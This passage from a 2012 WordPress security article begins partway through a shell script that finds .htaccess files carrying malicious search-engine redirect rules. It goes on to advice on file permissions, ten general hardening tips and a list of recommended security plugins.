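# Scan from the account's home directory, not only the web root, because the
# infection also drops copies outside the Web directory.

# htaccess_redirects ROOT
# Prints the path of each .htaccess under ROOT that matches both patterns.
# A hotlink-protection rule (RewriteCond on the referrer without search-engine
# names, RewriteRule to "-") or WordPress's own permalink rules are not flagged.
htaccess_redirects() {
    find "$1" -name .htaccess -type f | sort | while IFS= read -r f; do
        if grep -qiE 'RewriteCond[[:space:]]+%\{HTTP_REFERER\}.*(google|bing|yahoo|msn|aol|ask|altavista|live)' "$f" &&
           grep -qiE 'RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# htaccess_redirect_targets ROOT
# For each flagged file prints "file<TAB>target-url": the third field of the
# RewriteRule line is the substitution, i.e. where visitors are sent.
htaccess_redirect_targets() {
    htaccess_redirects "$1" | while IFS= read -r f; do
        grep -iE 'RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' "$f" |
            awk -v file="$f" '{ printf "%s\t%s\n", file, $3 }'
    done
}

# usage: sh htaccess-scan.sh /home/example-account
if [ "$#" -eq 1 ]; then
    htaccess_redirect_targets "$1"
fi
```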

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the file's permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won't do you much good.

The most important file to take care of is .htaccess. Check out the tutorial Protect Your WordPress Site with .htaccess for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you'll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tony's Top Ten Security Tips

  1. Get rid of generic accounts, and know who is accessing your environment.
  2. Harden your directories so that attackers can't use them against you. Kill PHP execution.
  3. Keep a backup; you never know when you'll need it.
  4. Connect securely to your server. SFTP and SSH are preferred.
  5. Avoid soup-kitchen servers. Segment between development, staging and production.
  6. Stay current with your software — all of it.
  7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
  8. You don't need to write posts as an administrator, nor does everyone need to be an administrator.
  9. If you don't know what you're doing, leverage a managed WordPress hosting provider.
  10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tony's Most Useful Security Plugins

  • Sucuri Sitecheck Malware Scanner
    This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
  • Login Lock
    This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
  • Two-Factor Authentication
    This plugin enables Duo's two-factor authentication, using a service such as a phone callback or SMS message.
  • Theme-Check
    Test your theme to make sure it's up to spec with theme review standards.
  • Plugin-Check
    Does what Theme-Check does but for plugins.



Siobhan McKeown for Smashing Magazine, 2012.

